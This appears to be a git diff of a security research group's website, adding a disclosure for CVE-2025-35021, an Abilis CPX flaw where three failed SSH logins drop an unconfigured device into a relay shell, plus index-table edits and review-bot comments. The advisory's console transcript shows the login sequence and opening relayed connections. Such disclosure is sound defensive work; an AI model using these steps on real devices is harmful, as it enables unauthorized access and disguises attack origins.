4 changes: 3 additions & 1 deletion content/cve.md
@@ -211,6 +211,7 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste.
| ----------------- | --------- | ------------------------------------------ | ---- |
| [CVE-2025-8452] | 0x00e2 | **Brother Printer Serial Number Disclosure** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001] |
| [CVE-2025-35027] | 0x00e4 | **Unitree Robotics Command Injection** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010] |
| [CVE-2025-35021] | 0x00e5 | **Abilis CPX Fallback Shell Connection Relay** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100] |
</div>

## Reserved GCVEs
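Review bot: the new `[CVE-2025-35021]` row is consistent with the rest of this change; its GCVE identifier (`...0100`) is the same one being dropped from the Reserved table and the same one defined as a link reference further down, so the move from reserved to published is traceable. The table is ordered by meeting number (0x00e5 after 0x00e4), not by CVE number, which matches the existing rows, so no reordering is needed.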
@@ -224,7 +225,6 @@ That said, starting in August of 2025, we've started to reserve [GCVEs](https://
| Meeting | GCVE (Reserved) |
|---------|-----------------|
| 0x00e4 | GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 |
| 0x00e5 | GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 |

</div>

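Review bot: removing the `0x00e5` row on publication is the right bookkeeping, but the remaining `0x00e4` row raises the question of whether the same should have happened for CVE-2025-35027, which is already listed in the published table with a different identifier (`...011` reserved here versus `...010` published). If the reserved identifier is meant to stay in this table after a meeting's CVE is published, a sentence saying so would help; if not, the `0x00e4` row should come out in this change as well.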
@@ -273,5 +273,7 @@ Vulnerabilities involving other parties must be either (1) presented at a regula
[CVE-2025-35010]: {{< baseurl >}}cves/cve-2025-35010/
[CVE-2025-8452]: {{< baseurl >}}cves/cve-2025-8452/
[CVE-2025-35027]: {{< baseurl >}}cves/cve-2025-35027/
[CVE-2025-35021]: {{< baseurl >}}cves/cve-2025-35021/
[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001
[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010
[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100
129 changes: 129 additions & 0 deletions content/cves/CVE-2025-35021.md
@@ -0,0 +1,129 @@
---
title: CVE-2025-35021
aliases:
- /cves/CVE-2025-35027.html
- /gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100
publishDate: 2025-11-03T18:06:00-06:00

---

## CVE-2025-35021: Abilis CPX Fallback Shell Connection Relay

[AHA!] has discovered an issue with Abilis CPX devices, and is publishing this disclosure in accordance with runZero's standard [disclosure policy] today, November 3, 2025. [CVE-2025-35021] has been assigned to this issue. Any questions about this disclosure should be directed to cve@takeonme.org.

The [GCVE](https://gcve.eu/about/) identifier for this issue is <span style="white-space: nowrap;">[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]</span>

# Executive Summary

By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can login to a restricted shell on the fourth attempt, and from there, relay connections. This issue is an instance of [CWE-1188](https://cwe.mitre.org/data/definitions/1188.html), 'Initialization of a Resource with an Insecure Default,' and is estimated to have a CVSS 3.1 score of [6.5](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant [SSVC] vectors for this vulnerability are *Exploitation: PoC* and *Technical Impact: Partial*.

# Technical Details

A number of Abilis CPX devices drop to a fallback shell after three unsuccessful login attempts, if the device is not already configured with an SSH password. This shell allows outbound sessions from the device.

In the example console session below, three known-incorrect logins (`bad`) are offered to an affected device before being dropped to the `SSHS` prompt.

```
$ ssh root@[TARGET]
root@TARGET's password:

COM

Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN
Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42
Login: bad

PERMISSION DENIED

Login: bad

PERMISSION DENIED

Login: bad

PERMISSION DENIED


CLR F0 AE

[192.168.11.002] SSHS>
```

At this point, we are in the `SSHS` shell. This is a restricted shell, though it can be used as a relay to other systems. The below example uses the `SSHC` shell:

```
[192.168.11.002]help
CP Open connection to local CP resource
SSH Open connection to local SSH client
TELNET Open connection to local TELNET client
<CD>-<UD> Open X25 call with CD and UD
CLR Close connection
CLOSE Close SSH Session
EXIT Close SSH Session
HELP Show current help
[192.168.11.002] SSHS>SSH
[192.168.11.002] SSHC>
[192.168.11.002] SSHC>OPEN 8.8.8.8:53
Trying 8.8.8.8:53 ... Open

Version identification fault
```

Similar to the `SSHC` shell, the `TELNETC` shell offers another path to connection relaying, and does not require the service to handshake a particular way:
```
[192.168.11.002] SSHS>TELNET
[192.168.11.002] TELNETC>
[192.168.11.002]TELNETC>open 1.2.3.4:5678
Trying 1.2.3.4:5678 ... Open
```

## Affected Products

Affected versions of CPX devices include:

* Abilis CPX - Ver. 7.4.10/STD - Build 3608.48
* Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10
* Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10
* Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11
* Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11
* Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11
* Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11
* Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11
* Abilis CPX - Ver. 9.0.0/STD - Build 4957.3 - Branch 9.0

Across these devices, affected SSH banners include:

* SSH-1.99-CPX SSH Server
* SSH-2.0-CPX SSH Server

## Mitigation

According to the vendor, setting a password to the SSH service will effectively remedy this behavior. Furthermore, firmware version 9.0.7 has been released so users can no longer accidentally expose an effectively no-authentication relay service.

# Attacker Value

By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets.

# Credit

This issue was discovered by [HD Moore](https://www.runzero.com/authors/hd-moore) and disclosure was coordinated by [Tod Beardsley](https://www.runzero.com/authors/tod-beardsley/) through the [AHA!] CNA.

# Timeline

* 2025-08-09 (Sat): Briefly demoed at [Def Con 33] in the presentation, [Shaking Out Shells with SSHamble]
* 2025-08-19 (Tue): Initial contact to the vendor at info@antek.it
* 2025-08-20 (Wed): Provided technical details to the vendor
* 2025-08-22 (Fri): Vendor acknowledged the vulnerability as a configuration issue
* 2025-10-21 (Tue): Vendor released [Abilis firmware update 9.0.7](https://support.abilis.net/relnotes/cpx2k/R9.0.html#R9.0.7)
* 2025-10-30 (Thu): Findings presented at AHA! Meeting 0x00e5 and [CVE-2025-35021] reserved
* 2025-11-03 (Mon): This public disclosure

----

[AHA!]: https://takeonme.org
[disclosure policy]: https://takeonme.org/cve.html
[CVE-2025-35021]: https://www.cve.org/CVERecord?id=CVE-2025-35021
[SSVC]: https://www.cisa.gov/stakeholder-specific-vulnerability-categorization-ssvc
[Def Con 33]: https://www.youtube.com/watch?v=XHoH4ic8fX8
[Shaking Out Shells with SSHamble]: https://www.runzero.com/def-con-33-hd-moore/
[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100
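Review bot: the alias `- /cves/CVE-2025-35027.html` in the front matter looks like a carry-over from the previous advisory; for this page it should be `/cves/CVE-2025-35021.html`, otherwise the old `.html` path for CVE-2025-35027 will redirect to this page and collide with that advisory's own alias. A few smaller points in the body: the transcript prompts are inconsistent (`[192.168.11.002]help` is missing the `SSHS>` shown on every other prompt, and `[192.168.11.002]TELNETC>open` is missing the space used on the line just above it); the prose refers to the `SSHC` and `TELNETC` shells while the help menu lists the commands as `SSH` and `TELNET`, so one sentence noting that the `SSH`/`TELNET` menu commands open the `SSHC`/`TELNETC` prompts would avoid confusion; the affected-version list is sorted lexically (8.11.11 and 8.11.14 before 8.11.2), which a numeric sort would fix; and "setting a password to the SSH service" should read "setting a password for the SSH service". In Mitigation it would also help to state whether the 7.4, 8.10 and 8.11 branches listed as affected receive a fix or whether operators on those branches must rely on the password workaround or upgrade to 9.0.7.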